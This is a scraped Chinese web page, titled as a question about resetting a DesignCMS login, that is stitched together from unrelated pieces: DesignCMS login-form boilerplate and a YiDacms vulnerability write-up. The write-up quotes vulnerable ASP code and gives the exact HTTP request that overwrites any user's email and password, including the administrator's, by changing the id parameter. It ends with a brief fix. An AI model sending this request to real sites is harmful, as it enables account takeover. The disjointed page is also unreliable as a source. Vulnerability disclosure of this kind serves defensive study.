designcms怎么重置密码登录名

来源:蜘蛛抓取(WebSpider) 时间:2016-04-11 07:50 标签: 重置
本文链接: 版权所有: 非特殊声明均为本站原创文章,转载请注明出处:
相关热词搜索:
看了上面的文章,想来说两句?!
360+原创模板程序
5800+正版模板用户
679000+模板下载次数
Copyright (C)
粤ICP备号-3
All Rights Reserved.
购买CMS网站模板请认准唯一官方网站:
- 官方购买模板均享受免费售后服务、CMS后台使用指导及网站优化支持.采用安全稳定的ASP.NET应用开发
最高效的基于.NET 2.0 Framework
功能强大的网站后台管理系统
&&&登录DesignCMS@35后台管理系统
密&&&码:&
&&&&&&&&&&
Copyright &
Technology Co., Ltd. All Rights Reserved.DesignCMS@35后台管理系统登录
采用安全稳定的ASP.NET应用开发
最高效的基于.NET 2.0 Framework
功能强大的网站后台管理系统
会员号/用户名:
密&& &&码:
Copyright (C)
Technology Co., Ltd. All Rights Reserved.YiDacms任意用户账号重置漏洞(包括管理员)
YiDacms 任意用户账号重置,不仅是密码
这个密码重置问题是我第一次遇到,完全是平衡权限问题
但是,估计是是程序猿的问题,在修改用户信息是不仅没有判断用户的属性,根据id直接修改,而且自己把用户的email和password都查出来,然后跟着一起提交了。。。
所以说是第一次遇到修改信息可以直接修改用户密码的,而且可以连email和password一起修改,所以连账号都不用找,直接修改成你想要的账号即可!!!
看看代码:
/Yidacms/user/user.文件:
if request(&yidacms&)=&system& Then
set rs=server.createobject(&adodb.recordset&)
user_id = cint(request(&id&))
sql=&select * from shuaiweb_user WHERE id= &&user_id&&&
rs.open sql,dbok,1,1
if session(&shuaiweb_useremail&)=&& then
response.write &请从新登录!&
response.end
if Request.Form(&shuaiweb_username&)=&& then
response.write &&script language=javascript& alert('姓名不能为空!');history.go(-1);&/script&&
response.end
set rs=server.createobject(&adodb.recordset&)
sql=&select * from shuaiweb_user WHERE id= &&user_id&&&
rs.open sql,dbok,1,3
rs(&shuaiweb_useremail&)=filter_Str(trim(request.form(&shuaiweb_useremail&)))
rs(&shuaiweb_userpass&)=filter_Str(trim(request.form(&shuaiweb_userpass&)))
rs(&shuaiweb_username&)=filter_Str(trim(request.form(&shuaiweb_username&)))
rs(&shuaiweb_usertel&)=filter_Str(trim(request.form(&shuaiweb_usertel&)))
rs(&shuaiweb_userqq&)=filter_Str(trim(request.form(&shuaiweb_userqq&)))
rs(&shuaiweb_usermsn&)=filter_Str(trim(request.form(&shuaiweb_usermsn&)))
rs(&shuaiweb_useraddress&)=filter_Str(trim(request.form(&shuaiweb_useraddress&)))
rs(&shuaiweb_userportrait&)=filter_Str(trim(request.form(&shuaiweb_userportrait&)))
rs(&shuaiweb_usernote&)=filter_Str(trim(request.form(&shuaiweb_usernote&)))
rs(&shuaiweb_usernumber&)=filter_Str(trim(request.form(&shuaiweb_usernumber&)))
set rs=nothing
response.write &&script language=javascript& alert('修改成功!');location.replace('user_system.asp');parent.location.reload();&/script&&
看到了,这里在修改是,直接带入了shuaiweb_useremail和shuaiweb_userpass
而且没有任何判断:
修改用户信息的请求如下:
http://10.65.40.6/Yidacms/user/user.asp?yidacms=system&id=3
shuaiweb_username=%C7%EB%C7%F3&shuaiweb_userportrait=%2FYidacms%2Ftemplate%2Fuser%2Fimages%2Fu1.gif&shuaiweb_usernumber=222&shuaiweb_usertel=&shuaiweb_userqq=222222&shuaiweb_usermsn=&shuaiweb_useraddress=222222&shuaiweb_usernote=222222&shuaiweb_useremail=&shuaiweb_userpass=965eb72c92&Submit=%CC%E1%BD%BB
id就是用户id
我们修改这里的id,就会修改对应id的用户的资料,里面就包括了用户的用户名和密码
下面看看漏洞证明
先来看看用户id=4,的用户资料信息:
这里这里的密码
发送请求:
http://10.65.40.6/Yidacms/user/user.asp?yidacms=system&id=4
shuaiweb_username=%C7%EB%C7%F3&shuaiweb_userportrait=%2FYidacms%2Ftemplate%2Fuser%2Fimages%2Fu1.gif&shuaiweb_usernumber=222&shuaiweb_usertel=&shuaiweb_userqq=222222&shuaiweb_usermsn=&shuaiweb_useraddress=222222&shuaiweb_usernote=222222&shuaiweb_useremail=&shuaiweb_userpass=965eb72c92&Submit=%CC%E1%BD%BB然后再来看看用户的密码
密码已经被修改了。
通用用户的其他资料也是随便可以修改的。
通过此漏洞瞬间既可以修改全部用户的账号信息
admin的id=1,这是程序默认安装时已经存在账号,直接修改管理员的账号。。
修复方案:
修改用户信息是,判断当前登陆的用户的属性采用安全稳定的ASP.NET应用开发
最高效的基于.NET 2.0 Framework
功能强大的网站后台管理系统
&&&登录DesignCMS@35后台管理系统
密&&&码:&
&&&&&&&&&&
Copyright &
Technology Co., Ltd. All Rights Reserved.

我要回帖

更多关于 重置 的文章

 

随机推荐